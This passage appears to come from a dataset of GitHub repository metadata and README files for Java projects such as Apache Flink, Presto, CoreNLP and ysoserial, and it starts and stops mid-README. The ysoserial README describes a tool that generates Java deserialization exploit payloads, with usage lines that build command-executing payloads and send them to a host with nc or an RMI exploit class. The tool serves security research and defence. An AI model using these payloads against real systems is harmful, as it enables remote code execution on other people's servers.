2. 生成 Model 等 MyBatis 配置文件的命令
```
mvn -Dmybatis.generator.overwrite=true mybatis-generator:generate
```
## 技术栈
| 技术 | 链接 |
| --- | --- |
| Spring Boot | http://projects.spring.io/spring-boot/#quick-start |
| MyBatis | https://mybatis.org/mybatis-3/zh/index.html |
| MyBatis Generator | http://mybatis.org/generator/ |
| H2 | http://www.h2database.com/html/main.html |
| Flyway | https://flywaydb.org/getstarted/firststeps/maven |
|Lombok| https://www.projectlombok.org |
|Bootstrap|https://v3.bootcss.com/getting-started/|
|Github OAuth|https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/|
|UFile|https://github.com/ucloud/ufile-sdk-java|
|Bootstrap|https://v3.bootcss.com/getting-started/|
## 扩展资料
[Spring 文档](https://spring.io/guides)
[Spring Web](https://spring.io/guides/gs/serving-web-content/)
[es](https://elasticsearch.cn/explore)
[Github deploy key](https://developer.github.com/v3/guides/managing-deploy-keys/#deploy-keys)
[Bootstrap](https://v3.bootcss.com/getting-started/)
[Github OAuth](https://developer.github.com/apps/building-oauth-apps/creating-an-oauth-app/)
[Spring](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#boot-features-embedded-database-support)
[菜鸟教程](https://www.runoob.com/mysql/mysql-insert-query.html)
[Thymeleaf](https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#setting-attribute-values)
[Spring Dev Tool](https://docs.spring.io/spring-boot/docs/2.0.0.RC1/reference/htmlsingle/#using-boot-devtools)
[Spring MVC](https://docs.spring.io/spring/docs/5.0.3.RELEASE/spring-framework-reference/web.html#mvc-handlermapping-interceptor)
[Markdown 插件](http://editor.md.ipandao.com/)
[UFfile SDK](https://github.com/ucloud/ufile-sdk-java)
[Count(*) VS Count(1)](https://mp.weixin.qq.com/s/Rwpke4BHu7Fz7KOpE2d3Lw)
[Git](https://git-scm.com/download)
[Visual Paradigm](https://www.visual-paradigm.com)
[Flyway](https://flywaydb.org/getstarted/firststeps/maven)
[Lombok](https://www.projectlombok.org)
[ctotree](https://www.octotree.io/)
[Table of content sidebar](https://chrome.google.com/webstore/detail/table-of-contents-sidebar/ohohkfheangmbedkgechjkmbepeikkej)
[One Tab](https://chrome.google.com/webstore/detail/chphlpgkkbolifaimnlloiipkdnihall)
[Live Reload](https://chrome.google.com/webstore/detail/livereload/jnihajbhpnppcggbcgedagnkighmdlei/related)
[Postman](https://chrome.google.com/webstore/detail/coohjcphdfgbiolnekdpbcijmhambjff)
## 更新日志
- 2019-7-30 修复 session 过期时间很短问题
- 2019-8-2 修复因为*和+号产生的搜索异常问题
- 2019-8-18 添加首页按照最新、最热、零回复排序
- 2019-8-18 修复搜索输入 ? 号出现异常问题
- 2019-8-22 修复图片大小限制和提问内容为空问题
- 2019-9-1 添加动态导航栏
- 2021-7-5 修复因为网络原因不能拉去到自定义 spring starter 问题
## 联系我
有任何问题可以扫码下面两个二维码找到我,左边是微信订阅号,关注回复 ‘面试’即可获得我整理的(2W字)阿里面经,右边是个人微信号,有任何技术上面的问题可以给我留言。
| 微信公众号 | 个人微信 |
| --- | --- |
| 码匠笔记 | fit8295 |
| ![](https://mawen-cdn.cn-bj.ufileos.com/wxdyh-qr.jpeg?iopcmd=thumbnail&type=1&scale=50) | ![](http://mawen-cdn.cn-bj.ufileos.com/wechat.jpeg?iopcmd=thumbnail&type=1&scale=50) |
"
apache/ratis,master,1170,401,2017-01-31T08:00:07Z,10587,20,Open source Java implementation for Raft consensus protocol.,consensus consensus-protocol java raft,"
# Apache Ratis
*[Apache Ratis]* is a Java library that implements the Raft protocol [1],
where an extended version of the Raft paper is available at .
The paper introduces Raft and states its motivations in following words:
> Raft is a consensus algorithm for managing a replicated log.
> It produces a result equivalent to (multi-)Paxos, and it is as efficient as Paxos,
> but its structure is different from Paxos; this makes Raft more understandable than Paxos
> and also provides a better foundation for building practical systems.
Ratis aims to make Raft available as a java library that can be used by any system that needs to use a replicated log.
It provides pluggability for state machine implementations to manage replicated states.
It also provides pluggability for Raft log, rpc implementations and metric implementations to make it easy for integration with other projects.
Another important goal is to support high throughput data ingest so that it can be used for more general data replication use cases.
* To build the artifacts, see [BUILDING.md](BUILDING.md).
* To run the examples, see [ratis-examples/README.md](ratis-examples/README.md).
## Reference
1. Diego Ongaro and John Ousterhout,
_[In Search of an Understandable Consensus Algorithm][Ongaro2014]_,
2014 USENIX Annual Technical Conference (USENIX ATC 14) (Philadelphia, PA), USENIX Association, 2014, pp. 305-319.
[Ongaro2014]: https://www.usenix.org/conference/atc14/technical-sessions/presentation/ongaro
[Apache Ratis]: https://ratis.apache.org/
"
allure-framework/allure2,main,3732,677,2016-05-27T14:06:05Z,14162,153,"Allure Report is a flexible, lightweight multi-language test reporting tool. It provides clear graphical reports and allows everyone involved in the development process to extract the maximum of information from the everyday testing process",allure reporting reporting-engine,"[license]: http://www.apache.org/licenses/LICENSE-2.0 ""Apache License 2.0""
[site]: https://allurereport.org/?source=github_allure2 ""Official Website""
[docs]: https://allurereport.org/docs/?source=github_allure2 ""Documentation""
[qametaio]: https://qameta.io/?source=Report_GitHub ""Qameta Software""
[blog]: https://qameta.io/blog ""Qameta Software Blog""
[Twitter]: https://twitter.com/QametaSoftware ""Qameta Software""
[twitter-team]: https://twitter.com/QametaSoftware/lists/team/members ""Team""
[build]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml
[build-badge]: https://github.com/allure-framework/allure2/actions/workflows/build.yaml/badge.svg
[maven]: https://repo.maven.apache.org/maven2/io/qameta/allure/allure-commandline/ ""Maven Central""
[maven-badge]: https://img.shields.io/maven-central/v/io.qameta.allure/allure-commandline.svg?style=flat
[release]: https://github.com/allure-framework/allure2/releases/latest ""Latest release""
[release-badge]: https://img.shields.io/github/release/allure-framework/allure2.svg?style=flat
[CONTRIBUTING.md]: .github/CONTRIBUTING.md
[CODE_OF_CONDUCT.md]: CODE_OF_CONDUCT.md
# Allure Report
[![build-badge][]][build] [![release-badge][]][release] [![maven-badge][]][maven] [![Backers on Open Collective](https://opencollective.com/allure-report/backers/badge.svg)](#backers) [![Sponsors on Open Collective](https://opencollective.com/allure-report/sponsors/badge.svg)](#sponsors)
> Allure Report is a flexible multi-language test report tool to show you a detailed representation of what has been tested and extract maximum from the everyday execution of tests.
- Learn more about Allure Report at [https://allurereport.org](https://allurereport.org)
- 📚 [Documentation](https://allurereport.org/docs/) – discover official documentation for Allure Report
- ❓ [Questions and Support](https://github.com/orgs/allure-framework/discussions/categories/questions-support) – get help from the team and community
- 📢 [Official announcements](https://github.com/orgs/allure-framework/discussions/categories/announcements) – stay updated with our latest news and updates
- 💬 [General Discussion](https://github.com/orgs/allure-framework/discussions/categories/general-discussion) – engage in casual conversations, share insights and ideas with the community
- 🖥️ [Live Demo](https://demo.allurereport.org/) — explore a live example of Allure Report in action
---
## Download
You can use one of the following ways to get Allure:
* Grab it from [releases](https://github.com/allure-framework/allure2/releases) (see Assets section).
* Using Homebrew:
```bash
$ brew install allure
```
* For Windows, Allure is available from the [Scoop](http://scoop.sh/) commandline-installer.
To install Allure, download and install Scoop and then execute in the Powershell:
```bash
scoop install allure
```
## How Allure Report works
Allure Report can build unified reports for dozens of testing tools across eleven programming languages on several CI/CD systems.
![How Allure Report works](.github/how_allure_works.jpg)
## Allure TestOps
[DevOps-ready Testing Platform built][qametaio] to reduce code time-to-market without quality loss. You can set up your product quality control and boost your QA and development team productivity by setting up your TestOps.
## Contributors
This project exists thanks to all the people who contributed. [[Contribute]](.github/CONTRIBUTING.md).
"
prestodb/presto,master,15585,5249,2012-08-09T01:03:37Z,210141,2042,The official home of the Presto distributed SQL query engine for big data,big-data data hadoop hive java lakehouse presto query sql,"# Presto
Presto is a distributed SQL query engine for big data.
See the [User Manual](https://prestodb.github.io/docs/current/) for deployment instructions and end user documentation.
## Contributing!
Please refer to the [contribution guidelines](https://github.com/prestodb/presto/blob/master/CONTRIBUTING.md) to get started
## Questions?
[Please join our Slack channel and ask in `#dev`](https://communityinviter.com/apps/prestodb/prestodb)."
apache/flink,master,23134,12940,2014-06-07T07:00:10Z,489132,1178,Apache Flink,big-data flink java python scala sql,"# Apache Flink
Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.
Learn more about Flink at [https://flink.apache.org/](https://flink.apache.org/)
### Features
* A streaming-first runtime that supports both batch processing and data streaming programs
* Elegant and fluent APIs in Java and Scala
* A runtime that supports very high throughput and low event latency at the same time
* Support for *event time* and *out-of-order* processing in the DataStream API, based on the *Dataflow Model*
* Flexible windowing (time, count, sessions, custom triggers) across different time semantics (event time, processing time)
* Fault-tolerance with *exactly-once* processing guarantees
* Natural back-pressure in streaming programs
* Libraries for Graph processing (batch), Machine Learning (batch), and Complex Event Processing (streaming)
* Built-in support for iterative programs (BSP) in the DataSet (batch) API
* Custom memory management for efficient and robust switching between in-memory and out-of-core data processing algorithms
* Compatibility layers for Apache Hadoop MapReduce
* Integration with YARN, HDFS, HBase, and other components of the Apache Hadoop ecosystem
### Streaming Example
```scala
case class WordWithCount(word: String, count: Long)
val text = env.socketTextStream(host, port, '\n')
val windowCounts = text.flatMap { w => w.split(""\\s"") }
.map { w => WordWithCount(w, 1) }
.keyBy(""word"")
.window(TumblingProcessingTimeWindow.of(Time.seconds(5)))
.sum(""count"")
windowCounts.print()
```
### Batch Example
```scala
case class WordWithCount(word: String, count: Long)
val text = env.readTextFile(path)
val counts = text.flatMap { w => w.split(""\\s"") }
.map { w => WordWithCount(w, 1) }
.groupBy(""word"")
.sum(""count"")
counts.writeAsCsv(outputPath)
```
## Building Apache Flink from Source
Prerequisites for building Flink:
* Unix-like environment (we use Linux, Mac OS X, Cygwin, WSL)
* Git
* Maven (we require version 3.8.6)
* Java 8 or 11 (Java 9 or 10 may work)
```
git clone https://github.com/apache/flink.git
cd flink
./mvnw clean package -DskipTests # this will take up to 10 minutes
```
Flink is now installed in `build-target`.
## Developing Flink
The Flink committers use IntelliJ IDEA to develop the Flink codebase.
We recommend IntelliJ IDEA for developing projects that involve Scala code.
Minimal requirements for an IDE are:
* Support for Java and Scala (also mixed projects)
* Support for Maven with Java and Scala
### IntelliJ IDEA
The IntelliJ IDE supports Maven out of the box and offers a plugin for Scala development.
* IntelliJ download: [https://www.jetbrains.com/idea/](https://www.jetbrains.com/idea/)
* IntelliJ Scala Plugin: [https://plugins.jetbrains.com/plugin/?id=1347](https://plugins.jetbrains.com/plugin/?id=1347)
Check out our [Setting up IntelliJ](https://nightlies.apache.org/flink/flink-docs-master/flinkDev/ide_setup.html#intellij-idea) guide for details.
### Eclipse Scala IDE
**NOTE:** From our experience, this setup does not work with Flink
due to deficiencies of the old Eclipse version bundled with Scala IDE 3.0.3 or
due to version incompatibilities with the bundled Scala version in Scala IDE 4.4.1.
**We recommend to use IntelliJ instead (see above)**
## Support
Don’t hesitate to ask!
Contact the developers and community on the [mailing lists](https://flink.apache.org/community.html#mailing-lists) if you need any help.
[Open an issue](https://issues.apache.org/jira/browse/FLINK) if you find a bug in Flink.
## Documentation
The documentation of Apache Flink is located on the website: [https://flink.apache.org](https://flink.apache.org)
or in the `docs/` directory of the source code.
## Fork and Contribute
This is an active open-source project. We are always open to people who want to use the system or contribute to it.
Contact us if you are looking for implementation tasks that fit your skills.
This article describes [how to contribute to Apache Flink](https://flink.apache.org/contributing/how-to-contribute.html).
## Externalized Connectors
Most Flink connectors have been externalized to individual repos under the [Apache Software Foundation](https://github.com/apache):
* [flink-connector-aws](https://github.com/apache/flink-connector-aws)
* [flink-connector-cassandra](https://github.com/apache/flink-connector-cassandra)
* [flink-connector-elasticsearch](https://github.com/apache/flink-connector-elasticsearch)
* [flink-connector-gcp-pubsub](https://github.com/apache/flink-connector-gcp-pubsub)
* [flink-connector-hbase](https://github.com/apache/flink-connector-hbase)
* [flink-connector-jdbc](https://github.com/apache/flink-connector-jdbc)
* [flink-connector-kafka](https://github.com/apache/flink-connector-kafka)
* [flink-connector-mongodb](https://github.com/apache/flink-connector-mongodb)
* [flink-connector-opensearch](https://github.com/apache/flink-connector-opensearch)
* [flink-connector-prometheus](https://github.com/apache/flink-connector-prometheus)
* [flink-connector-pulsar](https://github.com/apache/flink-connector-pulsar)
* [flink-connector-rabbitmq](https://github.com/apache/flink-connector-rabbitmq)
## About
Apache Flink is an open source project of The Apache Software Foundation (ASF).
The Apache Flink project originated from the [Stratosphere](http://stratosphere.eu) research project.
"
stanfordnlp/CoreNLP,main,9456,2694,2013-06-27T21:13:49Z,381906,177,"CoreNLP: A Java suite of core NLP tools for tokenization, sentence segmentation, NER, parsing, coreference, sentiment analysis, etc.",named-entity-recognition natural-language-processing nlp nlp-parsing stanford-nlp,"# Stanford CoreNLP
[![Run Tests](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml/badge.svg)](https://github.com/stanfordnlp/CoreNLP/actions/workflows/run-tests.yaml)
[![Maven Central](https://img.shields.io/maven-central/v/edu.stanford.nlp/stanford-corenlp.svg)](https://mvnrepository.com/artifact/edu.stanford.nlp/stanford-corenlp)
[![Twitter](https://img.shields.io/twitter/follow/stanfordnlp.svg?style=social&label=Follow)](https://twitter.com/stanfordnlp/)
[Stanford CoreNLP](http://stanfordnlp.github.io/CoreNLP/) provides a set of natural language analysis tools written in Java. It can take raw human language text input and give the base forms of words, their parts of speech, whether they are names of companies, people, etc., normalize and interpret dates, times, and numeric quantities, mark up the structure of sentences in terms of syntactic phrases or dependencies, and indicate which noun phrases refer to the same entities. It was originally developed for English, but now also provides varying levels of support for (Modern Standard) Arabic, (mainland) Chinese, French, German, Hungarian, Italian, and Spanish. Stanford CoreNLP is an integrated framework, which makes it very easy to apply a bunch of language analysis tools to a piece of text. Starting from plain text, you can run all the tools with just two lines of code. Its analyses provide the foundational building blocks for higher-level and domain-specific text understanding applications. Stanford CoreNLP is a set of stable and well-tested natural language processing tools, widely used by various groups in academia, industry, and government. The tools variously use rule-based, probabilistic machine learning, and deep learning components.
The Stanford CoreNLP code is written in Java and licensed under the GNU General Public License (v2 or later). Note that this is the full GPL, which allows many free uses, but not its use in proprietary software that you distribute to others.
### Build Instructions
Several times a year we distribute a new version of the software, which corresponds to a stable commit.
During the time between releases, one can always use the latest, under development version of our code.
Here are some helpful instructions to use the latest code:
#### Provided build
Sometimes we will provide updated jars here which have the latest version of the code.
At present, [the current released version of the code](https://stanfordnlp.github.io/CoreNLP/#download) is our most recent released jar, though you can always build the very latest from GitHub HEAD yourself.
#### Build with Ant
1. Make sure you have Ant installed, details here: [http://ant.apache.org/](http://ant.apache.org/)
2. Compile the code with this command: `cd CoreNLP ; ant`
3. Then run this command to build a jar with the latest version of the code: `cd CoreNLP/classes ; jar -cf ../stanford-corenlp.jar edu`
4. This will create a new jar called stanford-corenlp.jar in the CoreNLP folder which contains the latest code
5. The dependencies that work with the latest code are in CoreNLP/lib and CoreNLP/liblocal, so make sure to include those in your CLASSPATH.
6. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-models](http://nlp.stanford.edu/software/stanford-english-corenlp-models-current.jar), and [english-models-kbp](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in.
#### Build with Maven
1. Make sure you have Maven installed, details here: [https://maven.apache.org/](https://maven.apache.org/)
2. If you run this command in the CoreNLP directory: `mvn package` , it should run the tests and build this jar file: `CoreNLP/target/stanford-corenlp-4.5.4.jar`
3. When using the latest version of the code make sure to download the latest versions of the [corenlp-models](http://nlp.stanford.edu/software/stanford-corenlp-models-current.jar), [english-extra-models](http://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar), and [english-kbp-models](http://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) and include them in your CLASSPATH. If you are processing languages other than English, make sure to download the latest version of the models jar for the language you are interested in.
4. If you want to use Stanford CoreNLP as part of a Maven project you need to install the models jars into your Maven repository. Below is a sample command for installing the Spanish models jar. For other languages just change the language name in the command. To install `stanford-corenlp-models-current.jar` you will need to set `-Dclassifier=models`. Here is the sample command for Spanish: `mvn install:install-file -Dfile=/location/of/stanford-spanish-corenlp-models-current.jar -DgroupId=edu.stanford.nlp -DartifactId=stanford-corenlp -Dversion=4.5.4 -Dclassifier=models-spanish -Dpackaging=jar`
#### Models
The models jars that correspond to the latest code can be found in the table below.
Some of the larger (English) models -- like the shift-reduce parser and WikiDict -- are not distributed with our default models jar.
These require downloading the English (extra) and English (kbp) jars. Resources for other languages require usage of the corresponding
models jar.
The best way to get the models is to use git-lfs and clone them from Hugging Face Hub.
For instance, to get the French models, run the following commands:
```
# Make sure you have git-lfs installed
# (https://git-lfs.github.com/)
git lfs install
git clone https://huggingface.co/stanfordnlp/corenlp-french
```
The jars can be directly downloaded from the links below or the Hugging Face Hub page as well.
| Language | Model Jar | Last Updated |
| --- | --- | --- |
| Arabic | [download](https://nlp.stanford.edu/software/stanford-arabic-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-arabic/tree/main) | 4.5.6 |
| Chinese | [download](https://nlp.stanford.edu/software/stanford-chinese-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-chinese/tree/main)| 4.5.6 |
| English (extra) | [download](https://nlp.stanford.edu/software/stanford-english-extra-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-extra/tree/main) | 4.5.6 |
| English (KBP) | [download](https://nlp.stanford.edu/software/stanford-english-kbp-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-english-kbp/tree/main) | 4.5.6 |
| French | [download](https://nlp.stanford.edu/software/stanford-french-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-french/tree/main) | 4.5.6 |
| German | [download](https://nlp.stanford.edu/software/stanford-german-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-german/tree/main) | 4.5.6 |
| Hungarian | [download](https://nlp.stanford.edu/software/stanford-hungarian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-hungarian/tree/main) | 4.5.6 |
| Italian | [download](https://nlp.stanford.edu/software/stanford-italian-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-italian/tree/main)| 4.5.6 |
| Spanish | [download](https://nlp.stanford.edu/software/stanford-spanish-corenlp-models-current.jar) [(HF Hub)](https://huggingface.co/stanfordnlp/corenlp-spanish/tree/main)| 4.5.6 |
Thank you to [Hugging Face](https://huggingface.co/) for helping with our hosting!
### Install by Gradle
If you don't know Gradle itself, see official site: https://gradle.org
Write the following in your build.gradle according to [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.5/jar):
```Gradle
dependencies {
implementation 'edu.stanford.nlp:stanford-corenlp:4.5.5'
}
```
If you want to analyse English, add following:
```Gradle
implementation ""edu.stanford.nlp:stanford-corenlp:4.5.5:models""
implementation ""edu.stanford.nlp:stanford-corenlp:4.5.5:models-english""
implementation ""edu.stanford.nlp:stanford-corenlp:4.5.5:models-english-kbp""
```
If you use another version, replace ""4.5.5"" to a version you use.
### Useful resources
You can find releases of Stanford CoreNLP on [Maven Central](https://search.maven.org/artifact/edu.stanford.nlp/stanford-corenlp/4.5.4/jar).
You can find more explanation and documentation on [the Stanford CoreNLP homepage](http://stanfordnlp.github.io/CoreNLP/).
For information about making contributions to Stanford CoreNLP, see the file [CONTRIBUTING.md](CONTRIBUTING.md).
Questions about CoreNLP can either be posted on StackOverflow with the tag [stanford-nlp](http://stackoverflow.com/questions/tagged/stanford-nlp),
or on the [mailing lists](https://nlp.stanford.edu/software/#Mail).
"
kairosdb/kairosdb,develop,1725,345,2013-02-05T22:27:48Z,50191,136,Fast scalable time series database,java kairosdb metrics timeseries timeseries-database,"![KairosDB](webroot/img/kairosdb.png)
[![Build Status](https://travis-ci.org/kairosdb/kairosdb.svg?branch=develop)](https://travis-ci.org/kairosdb/kairosdb)
KairosDB is a fast distributed scalable time series database written on top of Cassandra.
## Documentation
Documentation is found [here](http://kairosdb.github.io/website/).
[Frequently Asked Questions](https://github.com/kairosdb/kairosdb/wiki/Frequently-Asked-Questions)
## Installing
Download the latest [KairosDB release](https://github.com/kairosdb/kairosdb/releases).
Installation instructions are found [here](http://kairosdb.github.io/docs/build/html/GettingStarted.html)
If you want to test KairosDB in Kubernetes please follow the instructions from [KairosDB Helm chart](deployment/helm/README.md).
## Getting Involved
Join the [KairosDB discussion group](https://groups.google.com/forum/#!forum/kairosdb-group).
## Contributing to KairosDB
Contributions to KairosDB are **very welcome**. KairosDB is mainly developed in Java, but there's a lot of tasks for non-Java programmers too, so don't feel shy and join us!
What you can do for KairosDB:
- [KairosDB Core](https://github.com/kairosdb/kairosdb): join the development of core features of KairosDB.
- [Website](https://github.com/kairosdb/kairosdb.github.io): improve the KairosDB website.
- [Documentation](https://github.com/kairosdb/kairosdb/wiki/Contribute:-Documentation): improve our documentation, it's a very important task.
If you have any questions about how to contribute to KairosDB, [join our discussion group](https://groups.google.com/forum/#!forum/kairosdb-group) and tell us your issue.
## License
The license is the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0)
"
frohoff/ysoserial,master,7281,1709,2015-01-28T07:13:55Z,463,42,A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.,deserialization exploit gadget java javadeser jvm poc serialization vulnerability,"
# ysoserial
[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
[![Travis Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)
[![Appveyor Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
[![JitPack](https://jitpack.io/v/frohoff/ysoserial.svg)](https://jitpack.io/#frohoff/ysoserial)
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
![logo](ysoserial.png)
## Description
Originally released as part of AppSecCali 2015 Talk
[""Marshalling Pickles: how deserializing objects will ruin your day""](
https://frohoff.github.io/appseccali-marshalling-pickles/)
with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x).
Later updated to include additional gadget chains for
[JRE <= 1.7u21](https://gist.github.com/frohoff/24af7913611f8406eaf3) and several other libraries.
__ysoserial__ is a collection of utilities and property-oriented programming ""gadget chains"" discovered in common java
libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of
objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
this data, the chain will automatically be invoked and cause the command to be executed on the application host.
It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
gadgets on the classpath.
## Disclaimer
This software has been created purely for the purposes of academic research and
for the development of effective defensive techniques, and is not intended to be
used to attack systems except where explicitly authorized. Project maintainers
are not responsible or liable for misuse of the software. Use responsibly.
## Usage
```shell
$ java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
```
## Examples
```shell
$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76 vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride..........
0000570: 0078 7071 007e 003a .xpq.~.:
$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin
$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
```
## Installation
[![GitHub release](https://img.shields.io/github/downloads/frohoff/ysoserial/latest/total)](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar)
Download the [latest release jar](https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar) from GitHub releases.
## Building
Requires Java 1.7+ and Maven 3.x+
```mvn clean package -DskipTests```
## Code Status
[![Build Status](https://api.travis-ci.com/frohoff/ysoserial.svg?branch=master)](https://travis-ci.com/github/frohoff/ysoserial)
[![Build status](https://ci.appveyor.com/api/projects/status/a8tbk9blgr3yut4g/branch/master?svg=true)](https://ci.appveyor.com/project/frohoff/ysoserial/branch/master)
## Contributing
1. Fork it
2. Create your feature branch (`git checkout -b my-new-feature`)
3. Commit your changes (`git commit -am 'Add some feature'`)
4. Push to the branch (`git push origin my-new-feature`)
5. Create new Pull Request
## See Also
* [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet): info on vulnerabilities, tools, blogs/write-ups, etc.
* [marshalsec](https://github.com/frohoff/marshalsec): similar project for various Java deserialization formats/libraries
* [ysoserial.net](https://github.com/pwntester/ysoserial.net): similar project for .NET deserialization
"
zouzg/mybatis-generator-gui,master,6592,2517,2016-05-08T22:39:39Z,14934,116,mybatis-generator界面工具,让你生成代码更简单更快捷,,"mybatis-generator-gui
==============
mybatis-generator-gui是基于 [mybatis generator](http://www.mybatis.org/generator/index.html) 开发一款界面工具, 本工具可以使你非常容易及快速生成Mybatis的Java POJO文件及数据库Mapping文件。
![image](https://user-images.githubusercontent.com/3505708/49334784-1a42c980-f619-11e8-914d-9ea85db9cec3.png)
![basic](https://user-images.githubusercontent.com/3505708/51911610-45754980-240d-11e9-85ad-643e55cafab2.png)
![overSSH](https://user-images.githubusercontent.com/3505708/51911646-5920b000-240d-11e9-9048-738306a56d14.png)
![SearchSupport](https://user-images.githubusercontent.com/8142133/115959972-881d2200-a541-11eb-8ad4-052f379b91f1.png)
### 核心特性
* 按照界面步骤轻松生成代码,省去XML繁琐的学习与配置过程
* 保存数据库连接与Generator配置,每次代码生成轻松搞定
* 内置常用插件,比如分页插件
* 支持OverSSH 方式,通过SSH隧道连接至公司内网访问数据库
* 把数据库中表列的注释生成为Java实体的注释,生成的实体清晰明了
* 可选的去除掉对版本管理不友好的注释,这样新增或删除字段重新生成的文件比较过来清楚
* 目前已经支持Mysql、Mysql8、Oracle、PostgreSQL与SQL Server,暂不对其他非主流数据库提供支持。(MySQL支持的比较好,其他数据库有什么问题可以在issue中反馈)
### 运行要求(重要!!!)
本工具仅支持Java的2个最新的LTS版本,jdk8和jdk11
* jdk1.8要求版本在1.8.0.60以上版本
* Java 11无版本要求
### 直接运行(非必须)
推荐使用IDE直接运行,如果需要二进制安装包,可以关注公众号获取二进制安装版,目前支持Windows和MacOS,注意你的JDK是不是1.8,并且版本大于1.8.0.60
### 启动本软件
* 方法一:关注微信公众号“搬砖头也要有态度”,回复“GUI”获取下载链接
![image](https://user-images.githubusercontent.com/3505708/61360019-2893dc00-a8b0-11e9-8dc9-a020e997ab87.png)
* 方法二: 自助构建
```bash
